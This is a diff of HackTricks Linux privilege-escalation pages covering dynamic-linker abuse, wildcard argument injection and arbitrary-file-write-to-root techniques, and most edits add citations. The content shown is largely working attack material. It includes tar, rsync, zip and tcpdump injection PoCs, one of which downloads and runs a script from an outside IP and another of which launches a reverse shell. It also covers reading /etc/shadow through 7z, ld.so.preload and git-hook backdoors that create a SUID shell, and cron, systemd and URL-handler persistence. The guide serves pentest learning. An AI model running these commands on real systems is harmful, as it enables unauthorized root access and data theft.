-The dynamic linker also reads system configuration such as `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, the linker cache, and in some cases `/etc/ld.so.preload`.
+`ld.so` uses the linker cache and `/etc/ld.so.preload`; `ldconfig` builds that cache from `/etc/ld.so.conf` and files included from it, commonly `/etc/ld.so.conf.d/`.<sup>[[1]](#references)[[7]](#references)[[8]](#references)</sup>
 
 High-value checks:
 
@@ -142,34 +140,47 @@ find /etc/ld.so.conf.d -type d -writable -ls 2>/dev/null
 ldconfig -v 2>/dev/null | head -n 50
 ```
 
-Writable linker configuration is usually more serious than a single vulnerable SUID binary because it can affect many dynamically linked processes. `/etc/ld.so.preload` is especially dangerous because it can force a shared object into privileged processes.
+Writable linker configuration is usually more serious than a single vulnerable SUID binary because it can affect many dynamically linked processes. `/etc/ld.so.preload` is especially dangerous because it can force a shared object into privileged processes.<sup>[[1]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ## SUID Hardlink Confusion
 
-Hardlinks can make the same SUID inode appear under multiple names. This is useful for hiding a privileged helper, confusing cleanup, or bypassing naive path-based review.
+Hardlinks can make the same SUID inode appear under multiple names.<sup>[[9]](#references)</sup> This is useful for hiding a privileged helper, confusing cleanup, or bypassing naive path-based review.
 
-Find SUID files with more than one link:
+Find SUID files with more than one link:<sup>[[9]](#references)</sup>
 
 ```bash
 find / -xdev -perm -4000 -type f -links +1 -ls 2>/dev/null
 ```
 
-Inspect all paths to the same inode:
+Inspect all paths to the same inode:<sup>[[9]](#references)</sup>
 
 ```bash
 stat /path/to/suid-wrapper
 find / -xdev -samefile /path/to/suid-wrapper -ls 2>/dev/null
 ```
 
-The abuse is not that a hardlink changes permissions. The abuse is path confusion: a privileged inode may be reachable through a name that defenders or scripts do not expect. For deeper inode and hardlink workflow, see [Filesystem, Inodes and Recovery](../main-system-information/filesystem-inodes-and-recovery.md).
+The abuse is not that a hardlink changes permissions. The abuse is path confusion: a privileged inode may be reachable through a name that defenders or scripts do not expect.<sup>[[9]](#references)</sup> For deeper inode and hardlink workflow, see [Filesystem, Inodes and Recovery](../main-system-information/filesystem-inodes-and-recovery.md).
 
 ## Defensive Notes
 
 - Keep SUID binaries minimal, audited, and package-managed where possible.
-- Avoid `RPATH`/`RUNPATH` entries pointing to writable or application-managed directories.
-- Keep library directories root-owned and non-writable by regular users.
-- Do not preserve `LD_PRELOAD`, `LD_LIBRARY_PATH`, or similar loader variables through sudo.
-- Monitor `/etc/ld.so.preload`, `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, and unexpected SUID files.
-- Review hardlinked SUID files and investigate custom SUID wrappers outside standard system paths.
+- Avoid `RPATH`/`RUNPATH` entries pointing to writable or application-managed directories.<sup>[[1]](#references)[[8]](#references)</sup>
+- Keep library directories root-owned and non-writable by regular users.<sup>[[8]](#references)</sup>
+- Do not preserve `LD_PRELOAD`, `LD_LIBRARY_PATH`, or similar loader variables through sudo.<sup>[[1]](#references)[[5]](#references)</sup>
+- Monitor `/etc/ld.so.preload`, `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, and unexpected SUID files.<sup>[[1]](#references)[[7]](#references)[[8]](#references)</sup>
+- Review hardlinked SUID files and investigate custom SUID wrappers outside standard system paths.<sup>[[9]](#references)</sup>
+
+## References
+
+- [1] [ld.so(8) — Linux manual page](https://man7.org/linux/man-pages/man8/ld.so.8.html)
+- [2] [strace(1) — Linux manual page](https://man7.org/linux/man-pages/man1/strace.1.html)
+- [3] [readelf (GNU Binary Utilities)](https://sourceware.org/binutils/docs/binutils/readelf.html)
+- [4] [sudo(8) — Linux manual page](https://www.man7.org/linux/man-pages/man8/sudo.8.html)
+- [5] [sudoers(5) — Linux manual page](https://man7.org/linux/man-pages/man5/sudoers.5.html)
+- [6] [Common Attributes (GCC)](https://gcc.gnu.org/onlinedocs/gcc/Common-Attributes.html)
+- [7] [ldconfig(8) — Linux manual page](https://man7.org/linux/man-pages/man8/ldconfig.8.html)
+- [8] [Dynamic Linker Hardening (The GNU C Library)](https://www.sourceware.org/glibc/manual/latest/html_node/Dynamic-Linker-Hardening.html)
+- [9] [Hard Links (GNU Findutils)](https://www.gnu.org/software/findutils/manual/html_node/find_html/Hard-Links.html)
+- [10] [objdump (GNU Binary Utilities)](https://www.sourceware.org/binutils/docs/binutils/objdump.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/interesting-files-permissions/wildcards-spare-tricks.md
+++ b/src/linux-hardening/interesting-files-permissions/wildcards-spare-tricks.md
@@ -1,18 +1,18 @@
 # Wildcards Spare Tricks
 
-{{#include ../../banners/hacktricks-training.md}}
-
 > Wildcard (aka *glob*) **argument injection** happens when a privileged script runs a Unix binary such as `tar`, `chown`, `rsync`, `zip`, `7z`, … with an unquoted wildcard like `*`.  
-> Since the shell expands the wildcard **before** executing the binary, an attacker who can create files in the working directory can craft filenames that begin with `-` so they are interpreted as **options instead of data**, effectively smuggling arbitrary flags or even commands.  
+> Since the shell expands the wildcard **before** executing the binary, an attacker who can create files in the working directory can craft filenames that begin with `-` so they are interpreted as **options instead of data**, effectively smuggling arbitrary flags or even commands.<sup>[[6]](#references)</sup>
 > This page collects the most useful primitives, recent research and modern detections for 2023-2025.
 
 ## chown / chmod
 
-You can **copy the owner/group or the permission bits of an arbitrary file** by abusing the `--reference` flag:
+You can **copy the owner/group or permission bits from a reference file** by abusing the `--reference` flag when an option-looking filename is expanded by a wildcard.<sup>[[6]](#references)[[8]](#references)[[9]](#references)</sup>
 
 ```bash
 # attacker-controlled directory
-touch "--reference=/root/secret``file"   # ← filename becomes an argument
+touch -- .drf.php
+chmod 777 -- .drf.php
+touch -- "--reference=.drf.php"   # ← filename becomes an argument
 ```
 
 When root later executes something like:
@@ -22,51 +22,51 @@ chown -R alice:alice *.php
 chmod -R 644 *.php
 ```
 
-`--reference=/root/secret``file` is injected, causing *all* matching files to inherit the ownership/permissions of `/root/secret``file`.
+The expanded `--reference=.drf.php` overrides the explicit owner/mode, causing matching files to inherit metadata from `.drf.php` (and, with the setup above, making them writable by the attacker).<sup>[[6]](#references)</sup>
 
-*PoC & tool*: [`wildpwn`](https://github.com/localh0t/wildpwn) (combined attack).  
+*PoC & tool*: [`wildpwn`](https://github.com/localh0t/wildpwn) (combined attack).<sup>[[7]](#references)</sup>
 See also the classic DefenseCode paper for details.<sup>[[6]](#references)</sup>
 
 ---
 
 ## tar
 
-### GNU tar (Linux, *BSD, busybox-full)
+### GNU tar
 
-Execute arbitrary commands by abusing the **checkpoint** feature:
+Execute arbitrary commands by abusing GNU tar's **checkpoint** feature and checkpoint actions.<sup>[[10]](#references)</sup>
 
 ```bash
 # attacker-controlled directory
 echo 'echo pwned > /tmp/pwn' > shell.sh
 chmod +x shell.sh
-touch "--checkpoint=1"
-touch "--checkpoint-action=exec=sh shell.sh"
+touch -- "--checkpoint=1"
+touch -- "--checkpoint-action=exec=sh shell.sh"
 ```
 
-Once root runs e.g. `tar -czf /root/backup.tgz *`, `shell.sh` is executed as root.
+Once root runs e.g. `tar -czf /root/backup.tgz *`, `shell.sh` is executed as root.<sup>[[10]](#references)</sup>
 
-### bsdtar / macOS 14+
+### bsdtar / macOS compressor override caveat
 
-The default `tar` on recent macOS (based on `libarchive`) does *not* implement `--checkpoint`, but you can still achieve code-execution with the **--use-compress-program** flag that allows you to specify an external compressor.
+The default `tar` on recent macOS (based on `libarchive`) does *not* provide GNU tar's `--checkpoint` interface, but bsdtar documents **--use-compress-program** for selecting an external compressor.<sup>[[11]](#references)</sup>
 
 ```bash
 # macOS example
-touch "--use-compress-program=/bin/sh"
+touch -- "--use-compress-program=sh"
 ```
-When a privileged script runs `tar -cf backup.tar *`, `/bin/sh` will be started. 
+When a privileged script runs `tar -cf backup.tar *`, this selects `sh` through the victim's `PATH` and bsdtar starts it as the compressor.<sup>[[11]](#references)</sup> This proves option injection but is not, by itself, a reliable arbitrary-command primitive: a wildcard-created filename cannot contain `/`, and bsdtar supplies archive data rather than an attacker-selected shell command. Code execution additionally requires a controllable executable resolved through `PATH` or another argument channel that can name a useful program.
 
 ---
 
 ## rsync
 
-`rsync` lets you override the remote shell or even the remote binary via command-line flags that start with `-e` or `--rsync-path`:
+`rsync` lets you override the remote shell or the remote binary via command-line flags such as `-e` and `--rsync-path`.<sup>[[12]](#references)</sup>
 
 ```bash
 # attacker-controlled directory
-touch "-e sh shell.sh"        # -e <cmd> => use <cmd> instead of ssh
+touch -- "-e sh shell.sh"        # -e <cmd> => use <cmd> instead of ssh
 ```
 
-If root later archives the directory with `rsync -az * backup:/srv/`, the injected flag spawns your shell on the remote side.
+If root later archives the directory with `rsync -az * backup:/srv/`, the injected flag can run a shell through the remote-shell mechanism.<sup>[[7]](#references)[[12]](#references)</sup>
 
 *PoC*: [`wildpwn`](https://github.com/localh0t/wildpwn) (`rsync` mode).
 
@@ -74,7 +74,7 @@ If root later archives the directory with `rsync -az * backup:/srv/`, the inject
 
 ## 7-Zip / 7z / 7za
 
-Even when the privileged script *defensively* prefixes the wildcard with `--` (to stop option parsing), the 7-Zip format supports **file list files** by prefixing the filename with `@`.  Combining that with a symlink lets you *exfiltrate arbitrary files*:
+Even when the privileged script *defensively* prefixes the wildcard with `--` (to stop option parsing), the 7-Zip CLI accepts **file list files** by prefixing the filename with `@`. Combining that with a symlink lets you *exfiltrate arbitrary files*.<sup>[[13]](#references)</sup>
 
 ```bash
 # directory writable by low-priv user
@@ -89,9 +89,9 @@ If root executes something like:
 7za a /backup/`date +%F`.7z -t7z -snl -- *
 ```
 
-7-Zip will attempt to read `root.txt` (→ `/etc/shadow`) as a file list and will bail out, **printing the contents to stderr**.
+7-Zip will attempt to read `root.txt` (→ `/etc/shadow`) as a file list and will bail out, **printing the contents to stderr**.<sup>[[13]](#references)</sup>
 
-This survives `-- *` because the 7-Zip CLI explicitly accepts both regular filenames and `@listfiles` as positional inputs, so a literal filename such as `@root.txt` is still treated specially.
+This survives `-- *` because the 7-Zip CLI explicitly accepts both regular filenames and `@listfiles` as positional inputs, so a literal filename such as `@root.txt` is still treated specially.<sup>[[13]](#references)</sup>
 
 ---
 
@@ -99,7 +99,7 @@ This survives `-- *` because the 7-Zip CLI explicitly accepts both regular filen
 
 Two very practical primitives exist when an application passes user-controlled filenames to `zip` (either via a wildcard or by enumerating names without `--`).<sup>[[2]](#references)[[3]](#references)</sup>
 
-- RCE via test hook: `-T` enables “test archive” and `-TT <cmd>` replaces the tester with an arbitrary program (long form: `--unzip-command <cmd>`). If you can inject filenames that start with `-`, split the flags across distinct filenames so short-options parsing works:
+- RCE via test hook: `-T` enables “test archive” and `-TT <cmd>` replaces the tester with an arbitrary program (long form: `--unzip-command <cmd>`). If you can inject filenames that start with `-`, split the flags across distinct filenames so short-options parsing works.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ```bash
 # Attacker-controlled filenames (e.g., in an upload directory)
@@ -111,45 +111,44 @@ Two very practical primitives exist when an application passes user-controlled f
 ```
 
 Notes
-- Do NOT try a single filename like `'-T -TT <cmd>'` — short options are parsed per character and it will fail. Use separate tokens as shown.
-- If slashes are stripped from filenames by the app, fetch from a bare host/IP (default path `/index.html`) and save locally with `-O`, then execute.
-- You can debug parsing with `-sc` (show processed argv) or `-h2` (more help) to understand how your tokens are consumed.
+- Do NOT try a single filename like `'-T -TT <cmd>'` — short options are parsed per character and it will fail. Use separate tokens as shown.<sup>[[3]](#references)</sup>
+- If slashes are stripped from filenames by the app, fetch from a bare host/IP (default path `/index.html`) and save locally with `-O`, then execute.<sup>[[3]](#references)</sup>
+- You can debug parsing with `-sc` (show processed argv) or `-h2` (more help) to understand how your tokens are consumed.<sup>[[3]](#references)</sup>
 
-Example (local behavior on zip 3.0):
+Example (local behavior on zip 3.0).<sup>[[3]](#references)</sup>
 
 ```bash
 zip test.zip -T '-TT wget 10.10.14.17/shell.sh' test.pcap    # fails to parse
 zip test.zip -T '-TT wget 10.10.14.17 -O s.sh; bash s.sh' test.pcap  # runs wget + bash
 ```
 
-- Data exfil/leak: If the web layer echoes `zip` stdout/stderr (common with naive wrappers), injected flags like `--help` or failures from bad options will surface in the HTTP response, confirming command-line injection and aiding payload tuning.
+- Data exfil/leak: If the web layer echoes `zip` stdout/stderr (common with naive wrappers), injected flags like `--help` or failures from bad options will surface in the HTTP response, confirming command-line injection and aiding payload tuning.<sup>[[3]](#references)</sup>
 
 ---
 
-## Additional binaries vulnerable to wildcard injection (2023-2025 quick list)
+## Additional option-injection candidates
 
-The following commands have been abused in modern CTFs and real environments.  The payload is always created as a *filename* inside a writable directory that will later be processed with a wildcard:
+When a privileged wrapper expands a writable directory with a wildcard, these documented option hooks are worth checking.<sup>[[15]](#references)[[16]](#references)[[17]](#references)</sup>
 
 | Binary | Flag to abuse | Effect |
 | --- | --- | --- |
-| `bsdtar` | `--newer-mtime=@<epoch>` → arbitrary `@file` | Read file contents |
-| `flock` | `-c <cmd>` | Execute command |
-| `git`   | `-c core.sshCommand=<cmd>` | Command execution via git over SSH |
-| `scp`   | `-S <cmd>` | Spawn arbitrary program instead of ssh |
+| `flock` | `-c <cmd>` | Pass a command string to a shell |
+| `git`   | `-c core.sshCommand=<cmd>` | Use `<cmd>` instead of SSH for Git fetch/push |
+| `scp`   | `-S <program>` | Use an alternate SSH-compatible connection program |
 
-These primitives are less common than the *tar/rsync/zip* classics but worth checking when hunting.
+These primitives are useful checks beyond the *tar/rsync/zip* classics.
 
 ---
 
 ## Hunting vulnerable wrappers and jobs
 
-Recent case studies have shown that wildcard/argv injection is no longer just a **cron + tar** problem.<sup>[[5]](#references)</sup> The same bug class keeps appearing in:
+Recent case studies and detection guidance show that wildcard/argv injection is no longer just a **cron + tar** problem.<sup>[[3]](#references)[[4]](#references)[[5]](#references)</sup> The same bug class keeps appearing in:
 
 - web features that "download everything as zip/tar" from attacker-controlled upload directories
 - vendor/appliance debug shells that expose a **tcpdump** wrapper with attacker-controlled filename/filter fields
 - backup or rotation jobs that call `tar`, `rsync`, `7z`, `zip`, `chown`, or `chmod` on writable directories
 
-Useful triage commands:
+Useful triage commands (the `pspy` invocation uses its documented process/file-event and interval flags).<sup>[[14]](#references)</sup>
 
 ```bash
 # Hunt for interesting binaries fed with globs or positional user data
@@ -167,22 +166,22 @@ rg -n 'tcpdump|zip|tar|rsync' /etc/sudoers /etc/sudoers.d 2>/dev/null
 
 Quick heuristics:
 
-- `-- *` is a good fix for many GNU tools, but **not** for `7z`/`7za` because `@listfiles` are parsed separately.
-- For `zip`, look for wrappers that enumerate user-controlled filenames directly; short-option splitting (`-T` + `-TT <cmd>`) still works even without a shell glob.
-- For `tcpdump`, pay special attention to wrappers that let you control **output file names**, **rotation settings**, or **capture-file replay** arguments.
+- `-- *` is a good fix for many GNU tools, but **not** for `7z`/`7za` because `@listfiles` are parsed separately.<sup>[[13]](#references)</sup>
+- For `zip`, look for wrappers that enumerate user-controlled filenames directly; short-option splitting (`-T` + `-TT <cmd>`) still works even without a shell glob.<sup>[[2]](#references)[[3]](#references)</sup>
+- For `tcpdump`, pay special attention to wrappers that let you control **output file names**, **rotation settings**, or **capture-file replay** arguments.<sup>[[18]](#references)</sup>
 
 ---
 
 ## tcpdump rotation hooks (-G/-W/-z): RCE via argv injection in wrappers
 
-When a restricted shell or vendor wrapper builds a `tcpdump` command line by concatenating user-controlled fields (e.g., a "file name" parameter) without strict quoting/validation, you can smuggle extra `tcpdump` flags. The combo of `-G` (time-based rotation), `-W` (limit number of files), and `-z <cmd>` (post-rotate command) yields arbitrary command execution as the user running tcpdump (often root on appliances).<sup>[[1]](#references)[[4]](#references)</sup>
+When a restricted shell or vendor wrapper builds a `tcpdump` command line by concatenating user-controlled fields (e.g., a "file name" parameter) without strict quoting/validation, you can smuggle extra `tcpdump` flags. The combo of `-G` (time-based rotation), `-W` (limit number of files), and `-z <cmd>` (post-rotate command) yields arbitrary command execution as the user running tcpdump (often root on appliances).<sup>[[1]](#references)[[4]](#references)[[18]](#references)</sup>
 
 Preconditions:
 
-- You can influence `argv` passed to `tcpdump` (e.g., via a wrapper like `/debug/tcpdump --filter=... --file-name=<HERE>`).
-- The wrapper does not sanitize spaces or `-`-prefixed tokens in the file name field.
+- You can influence `argv` passed to `tcpdump` (e.g., via a wrapper like `/debug/tcpdump --filter=... --file-name=<HERE>`).<sup>[[4]](#references)[[18]](#references)</sup>
+- The wrapper does not sanitize spaces or `-`-prefixed tokens in the file name field.<sup>[[4]](#references)</sup>
 
-Classic PoC (executes a reverse shell script from a writable path):
+Classic PoC (executes a reverse shell script from a writable path).<sup>[[4]](#references)[[18]](#references)</sup>
 
 ```sh
 # Reverse shell payload saved on the device (e.g., USB, tmpfs)
@@ -204,30 +203,30 @@ printf x | nc -u -6 [victim_ipv6] 1234
 
 Details:
 
-- `-G 1 -W 1` forces an immediate rotate after the first matching packet.
-- `-z <cmd>` runs the post-rotate command once per rotation. Many builds execute `<cmd> <savefile>`. If `<cmd>` is a script/interpreter, ensure the argument handling matches your payload.
+- `-G 1` rotates every second, and `-W 1` stops after one rotated file; the capture must receive a matching packet before rotation.<sup>[[18]](#references)</sup>
+- `-z <cmd>` runs the post-rotate command once per rotation and passes the closed savefile path as an argument; ensure script/interpreter argument handling matches your payload.<sup>[[18]](#references)</sup>
 
 No-removable-media variants:
 
-- If you have any other primitive to write files (e.g., a separate command wrapper that allows output redirection), drop your script into a known path and trigger `-z /bin/sh /path/script.sh` or `-z /path/script.sh` depending on platform semantics.
-- Some vendor wrappers rotate to attacker-controllable locations. If you can influence the rotated path (symlink/directory traversal), you can steer `-z` to execute content you fully control without external media.
+- If you have any other primitive to write files (e.g., a separate command wrapper that allows output redirection), drop your script into a known path and trigger `-z /path/script.sh`; have the script invoke `/bin/sh` itself if needed.<sup>[[18]](#references)</sup>
+- If a vendor wrapper lets you choose the rotated path, audit that path control only in combination with a post-rotate command that interprets its savefile argument; path control alone does not execute file contents.<sup>[[18]](#references)</sup>
 
 ---
 
 ## sudoers: tcpdump with wildcards/additional args → arbitrary write/read and root
 
-Very common sudoers anti-pattern:<sup>[[3]](#references)</sup>
+Example sudoers anti-pattern:<sup>[[3]](#references)</sup>
 
 ```text
 (ALL : ALL) NOPASSWD: /usr/bin/tcpdump -c10 -w/var/cache/captures/*/<GUID-PATTERN> -F/var/cache/captures/filter.<GUID-PATTERN>
 ```
 
-Issues
-- The `*` glob and permissive patterns only constrain the first `-w` argument. `tcpdump` accepts multiple `-w` options; the last one wins.  
-- The rule doesn’t pin other options, so `-Z`, `-r`, `-V`, etc. are allowed.
+The rule leaves several options available under tcpdump's documented parser:<sup>[[3]](#references)[[18]](#references)</sup>
+- The `*` glob and permissive patterns only constrain the first `-w` argument. `tcpdump` accepts multiple `-w` options; the last one wins.<sup>[[3]](#references)[[18]](#references)</sup>
+- The rule doesn’t pin other options, so `-Z`, `-r`, `-V`, etc. are allowed.<sup>[[3]](#references)[[18]](#references)</sup>
 
-Primitives
-- Override destination path with a second `-w` (first only satisfies sudoers):
+The relevant primitives are documented below.<sup>[[3]](#references)[[18]](#references)</sup>
+- Override destination path with a second `-w` (first only satisfies sudoers).<sup>[[3]](#references)[[18]](#references)</sup>
 
 ```bash
 sudo tcpdump -c10 -w/var/cache/captures/a/ \
@@ -235,7 +234,7 @@ sudo tcpdump -c10 -w/var/cache/captures/a/ \
   -F /var/cache/captures/filter.aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa
 ```
 
-- Path traversal inside the first `-w` to escape the constrained tree:
+- Path traversal inside the first `-w` to escape the constrained tree.<sup>[[3]](#references)</sup>
 
 ```bash
 sudo tcpdump -c10 \
@@ -243,7 +242,7 @@ sudo tcpdump -c10 \
   -F/var/cache/captures/filter.aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa
 ```
 
-- Force output ownership with `-Z root` (creates root-owned files anywhere):
+- Force output ownership with `-Z root` (creates root-owned files anywhere).<sup>[[3]](#references)[[18]](#references)</sup>
 
 ```bash
 sudo tcpdump -c10 -w/var/cache/captures/a/ -Z root \
@@ -251,7 +250,7 @@ sudo tcpdump -c10 -w/var/cache/captures/a/ -Z root \
   -F /var/cache/captures/filter.aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa
 ```
 
-- Arbitrary-content write by replaying a crafted PCAP via `-r` (e.g., to drop a sudoers line):
+- Arbitrary-content write by replaying a crafted PCAP via `-r` (e.g., to drop a sudoers line).<sup>[[3]](#references)[[18]](#references)</sup>
 
 <details>
 <summary>Create a PCAP that contains the exact ASCII payload and write it as root</summary>
@@ -270,7 +269,7 @@ sudo tcpdump -c10 -w/var/cache/captures/a/ -Z root \
 
 </details>
 
-- Arbitrary file read/secret leak with `-V <file>` (interprets a list of savefiles). Error diagnostics often echo lines, leaking content:
+- Arbitrary file read/secret leak with `-V <file>` (interprets a list of savefiles). Error diagnostics often echo lines, leaking content.<sup>[[3]](#references)[[18]](#references)</sup>
 
 ```bash
 sudo tcpdump -c10 -w/var/cache/captures/a/ -V /root/root.txt \
@@ -288,5 +287,17 @@ sudo tcpdump -c10 -w/var/cache/captures/a/ -V /root/root.txt \
 - [4] [FiberGateway GR241AG - Full Exploit Chain](https://r0ny.net/FiberGateway-GR241AG-Full-Exploit-Chain/)
 - [5] [Elastic - Potential Shell via Wildcard Injection Detected](https://www.elastic.co/guide/en/security/current/prebuilt-rule-8-19-20-potential-shell-via-wildcard-injection-detected.html)
 - [6] [Back To The Future: Unix Wildcards Gone Wild (DefenseCode)](https://www.exploit-db.com/papers/33930)
+- [7] [wildpwn](https://github.com/localh0t/wildpwn)
+- [8] [GNU Coreutils `chown` invocation](https://www.gnu.org/software/coreutils/manual/html_node/chown-invocation.html)
+- [9] [GNU Coreutils `chmod` invocation](https://www.gnu.org/software/coreutils/manual/html_node/chmod-invocation.html)
+- [10] [GNU tar checkpoints](https://www.gnu.org/software/tar/manual/html_section/checkpoints.html)
+- [11] [bsdtar(1) manual](https://man.freebsd.org/cgi/man.cgi?query=bsdtar&sektion=1)
+- [12] [rsync(1) manual](https://download.samba.org/pub/rsync/rsync.1)
+- [13] [7-Zip command line syntax](https://7-zip.opensource.jp/chm/cmdline/syntax.htm)
+- [14] [pspy](https://github.com/DominicBreuker/pspy)
+- [15] [flock(1) manual](https://kernel.googlesource.com/pub/scm/utils/util-linux/util-linux/+/refs/tags/v2.41.1/sys-utils/flock.1.adoc)
+- [16] [Git configuration documentation](https://git-scm.com/docs/git-config)
+- [17] [OpenBSD `scp` manual](https://man.openbsd.org/scp)
+- [18] [tcpdump(8) manual](https://man7.org/linux/man-pages/man8/tcpdump.8.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/linux-hardening/interesting-files-permissions/write-to-root.md
+++ b/src/linux-hardening/interesting-files-permissions/write-to-root.md
@@ -1,11 +1,9 @@
 # Arbitrary File Write to Root
 
-{{#include ../../banners/hacktricks-training.md}}
-
 ### /etc/ld.so.preload
 
-This file behaves like **`LD_PRELOAD`** env variable but it also works in **SUID binaries**.\
-If you can create it or modify it, you can just add a **path to a library that will be loaded** with each executed binary.
+`/etc/ld.so.preload` is a system-wide list of shared objects that the dynamic linker loads before other shared objects. Secure-execution mode applies additional restrictions to preloading, so a library path such as `/tmp/pe.so` is not a universal SUID-binary technique.\
+If you can create or modify it, a process that loads the file will load the listed library before its other shared objects, allowing code execution in that process's context.<sup>[[12]](#references)</sup>
 
 For example: `echo "/tmp/pe.so" > /etc/ld.so.preload`
 
@@ -13,6 +11,7 @@ For example: `echo "/tmp/pe.so" > /etc/ld.so.preload`
 #include <stdio.h>
 #include <sys/types.h>
 #include <stdlib.h>
+#include <unistd.h>
 
 void _init() {
     unlink("/etc/ld.so.preload");
@@ -26,18 +25,18 @@ void _init() {
 
 ### Git hooks
 
-[**Git hooks**](https://git-scm.com/book/en/v2/Customizing-Git-Git-Hooks) are **scripts** that are **run** on various **events** in a git repository like when a commit is created, a merge... So if a **privileged script or user** is performing this actions frequently and it's possible to **write in the `.git` folder**, this can be used to **privesc**.
+**Git hooks** are executable scripts run for events in a repository, including commit and merge operations. If a **privileged script or user** performs those actions and an attacker can **write in the `.git` folder**, the hook can be used for **privilege escalation**.<sup>[[13]](#references)</sup>
 
 For example, It's possible to **generate a script** in a git repo in **`.git/hooks`** so it's always executed when a new commit is created:
 
 ```bash
-echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
+echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/0xdf' > pre-commit
 chmod +x pre-commit
 ```
 
 ### Cron & Time files
 
-If you can **write cron-related files that root executes**, you can usually get code execution the next time the job runs. Interesting targets include:
+If you can **write cron-related files that root executes**, you can usually get code execution the next time the job runs. Interesting targets include:<sup>[[14]](#references)[[20]](#references)</sup>
 
 - `/etc/crontab`
 - `/etc/cron.d/*`
@@ -80,12 +79,12 @@ chmod +x /etc/cron.daily/backup
 
 Notes:
 
-- `run-parts` usually ignores filenames containing dots, so prefer names like `backup` instead of `backup.sh`.
-- Some distros use `anacron` or `systemd` timers instead of classic cron, but the abuse idea is the same: **modify what root will execute later**.
+- `run-parts` usually ignores filenames containing dots, so prefer names like `backup` instead of `backup.sh`.<sup>[[15]](#references)</sup>
+- Some systems use `systemd` timers instead of classic cron, but the abuse idea is the same: **modify what root will execute later**.<sup>[[20]](#references)</sup>
 
 ### Service & Socket files
 
-If you can write **`systemd` unit files** or files referenced by them, you may be able to get code execution as root by reloading and restarting the unit, or by waiting for the service/socket activation path to trigger.
+If you can write **`systemd` unit files** or files referenced by them, you may be able to get code execution as root by reloading and restarting the unit, or by waiting for the service/socket activation path to trigger.<sup>[[16]](#references)[[17]](#references)[[18]](#references)[[19]](#references)</sup>
 
 Interesting targets include:
 
@@ -98,10 +97,10 @@ Interesting targets include:
 Quick checks:
 
 ```bash
-ls -la /etc/systemd/system /lib/systemd/system 2>/dev/null
+ls -la /etc/systemd/system /lib/systemd/system /usr/lib/systemd/system 2>/dev/null
 systemctl list-units --type=service --all 2>/dev/null
 systemctl list-units --type=socket --all 2>/dev/null
-grep -R "^ExecStart=\\|^EnvironmentFile=\\|^ListenStream=" /etc/systemd/system /lib/systemd/system 2>/dev/null
+grep -R "^ExecStart=\\|^EnvironmentFile=\\|^ListenStream=" /etc/systemd/system /lib/systemd/system /usr/lib/systemd/system 2>/dev/null
 ```
 
 Common abuse paths:
@@ -127,7 +126,7 @@ systemctl restart vulnerable.service
 # or trigger the socket-backed service by connecting to it
 ```
 
-If you cannot restart services yourself but can edit a socket-activated unit, you may only need to **wait for a client connection** to trigger execution of the backdoored service as root.
+If you cannot restart services yourself but can edit a socket-activated unit, you may only need to **wait for a client connection** to trigger execution of the backdoored service as root.<sup>[[17]](#references)</sup>
 
 ### Overwrite a restrictive `php.ini` used by a privileged PHP sandbox
 
@@ -149,26 +148,25 @@ If the daemon runs as root (or validates with root-owned paths), the second exec
 
 ### binfmt_misc
 
-The file located in `/proc/sys/fs/binfmt_misc` indicates which binary should execute whic type of files. TODO: check the requirements to abuse this to execute a rev shell when a common file type is open.
+`binfmt_misc` exposes registrations under `/proc/sys/fs/binfmt_misc`; each registration associates a file-type pattern with an interpreter. The privilege impact depends on who can change the registration and which process later executes the matching file, so verify those requirements before treating it as a privilege-escalation path.<sup>[[21]](#references)</sup>
 
 ### Overwrite schema handlers (like http: or https:)
 
-An attacker with write permissions to a victim's configuration directories can easily replace or create files that change system behavior, resulting in unintended code execution. By modifying the `$HOME/.config/mimeapps.list` file to point HTTP and HTTPS URL handlers to a malicious file (e.g., setting `x-scheme-handler/http=evil.desktop`), the attacker ensures that **clicking any http or https link triggers code specified in that `evil.desktop` file**. For example, after placing the following malicious code in `evil.desktop` in `$HOME/.local/share/applications`, any external URL click runs the embedded command:
+Desktop environments use MIME associations and desktop entries to choose an application for URI schemes; an attacker who can write the relevant per-user configuration and desktop-entry directories can redirect those schemes to a launcher they control. By modifying the `$HOME/.config/mimeapps.list` file to point HTTP and HTTPS URL handlers to a malicious file (for example, `x-scheme-handler/http=evil.desktop` and `x-scheme-handler/https=evil.desktop`), a user click can invoke that desktop entry.<sup>[[22]](#references)[[23]](#references)[[24]](#references)</sup>
 
 ```bash
 [Desktop Entry]
-Exec=sh -c 'zenity --info --title="$(uname -n)" --text="$(id)"'
 Type=Application
 Name=Evil Desktop Entry
+Exec=/bin/sh -c "id > /tmp/mime-handler-pwned"
+MimeType=x-scheme-handler/http;x-scheme-handler/https;
 ```
-
-For more info check [**this post**](https://chatgpt.com/c/67fac01f-0214-8006-9db3-19c40e45ee49) where it was used to exploit a real vulnerability.
 
 ### Root executing user-writable scripts/binaries
 
 If a privileged workflow runs something like `/bin/sh /home/username/.../script` (or any binary inside a directory owned by an unprivileged user), you can hijack it:<sup>[[1]](#references)</sup>
 
-- **Detect the execution:** monitor processes with [pspy](https://github.com/DominicBreuker/pspy) to catch root invoking user-controlled paths:
+- **Detect the execution:** monitor processes with pspy to catch root invoking user-controlled paths.<sup>[[25]](#references)</sup>
 
 ```bash
 wget http://attacker/pspy64 -O /dev/shm/pspy64
@@ -194,15 +192,15 @@ chmod +x server-command
 
 ### Page-cache-only file modification of privileged binaries
 
-Some kernel bugs don't modify the file **on disk**. Instead, they let you modify only the **page cache copy** of a readable file. If you can target a **setuid** or otherwise **root-executed** binary, the next execution may run attacker-controlled bytes from memory and escalate privileges even though the file hash on disk is unchanged.
